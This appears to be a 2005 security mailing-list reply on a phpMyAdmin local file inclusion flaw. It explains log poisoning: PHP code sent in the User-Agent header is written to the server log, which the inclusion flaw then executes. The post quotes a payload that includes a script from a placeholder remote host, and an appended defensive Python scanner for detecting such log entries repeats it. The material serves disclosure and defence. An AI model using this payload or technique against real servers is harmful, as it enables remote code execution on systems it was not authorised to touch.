
Re: [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1




On Mon, Oct 10 16:11, Maksymilian Arciemowicz <max@xxxxxxxxxxxx> wrote:
> --- 0.Description ---
> phpMyAdmin 2.6.4 is a tool written in PHP intended to
> handle the administration of MySQL over the Web.
> [...]
> phpMyAdmin is very dangerous script.
> 
> --- 1. Local file inclusion (Critical) ---
> File: ./libraries/grab_globals.lib.php

hi again,

since my post yesterday apparently had some trouble being delivered
because of a "suspicious attachment" (my pgp sig :)) i thought i'd
send it again.  and this time even as a reply to the right message... :)

in case you already got this, sorry for bothering twice,


andi

----- quote on ---------------------------------------------------------
this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz.  i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here.  actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated.  but given php's include
statement they are -- if they contain a valid php statement.  now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i asked myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the user
agent string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read the server's log file and this way execute the code.

of course this method doesn't always work.  php mustn't run in safe
mode, the web server has to log user agent strings and the log files
must be accessible after privileges have been dropped.  since most
people are logging in combined format, i guess the last requirement is
the most critical one, but many logs are world-readable nevertheless.
also, enabled url-based includes make things easier, but they're not
strictly necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include.  with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it.  any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not have been
used before.  maybe someone can just point me to an already existing
discussion about this... :)

[1] http://www.securityfocus.com/bid/15053
----- quote off --------------------------------------------------------

-- 
zeidler it consulting - http://zitc.de/ - info@xxxxxxx
karl-kunger-str 59 - 12435 berlin - phone +49 30 25563779
no software patents in europe! - http://noepatents.eu.org/
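A defender-side check for the technique described in this message, as an added example that is not part of the original post: it scans combined-format access log lines for PHP opening tags in client-controlled fields and tests whether a log file is readable by "other", the precondition the message calls the most critical. The function names, sample log lines and addresses are constructed for illustration.

```python
import os
import re
import stat

# "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# PHP opening tag "<?" (covers <?php and <?=), raw or percent-encoded.
# "<?xml" also matches, so treat hits as entries to review, not as proof.
PHP_TAG = re.compile(r'(?:<|%3c)(?:\?|%3f)', re.IGNORECASE)
CLIENT_FIELDS = ("request", "referer", "agent")  # all attacker-controlled

def find_poisoned_entries(lines):
    """Return (line_no, field, host) for each client field holding a PHP open tag."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = COMBINED.match(line.rstrip("\n"))
        if not m:
            # Unparseable line: scan it whole rather than skip it silently.
            if PHP_TAG.search(line):
                hits.append((no, "raw", None))
            continue
        for field in CLIENT_FIELDS:
            if PHP_TAG.search(m.group(field)):
                hits.append((no, field, m.group("host")))
    return hits

def readable_by_others(path):
    """True if the file mode grants read to 'other' (world-readable log)."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [10/Oct/2005:16:11:00 +0200] "GET /index.php HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux i686)"',
    '192.0.2.66 - - [10/Oct/2005:16:12:00 +0200] "GET / HTTP/1.1" '
    '200 512 "-" "<?php include(\'http://xx.xx.xx.xx/script.php\'); ?>"',
    '192.0.2.66 - - [10/Oct/2005:16:13:00 +0200] '
    '"GET /?x=%3C%3Fphp+phpinfo()%3B HTTP/1.1" 404 0 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for hit in find_poisoned_entries(SAMPLE):
        print(hit)
```

A log file that reports `readable_by_others(...)` as true can be tightened with a mode such as 0640 so the unprivileged PHP process cannot open it.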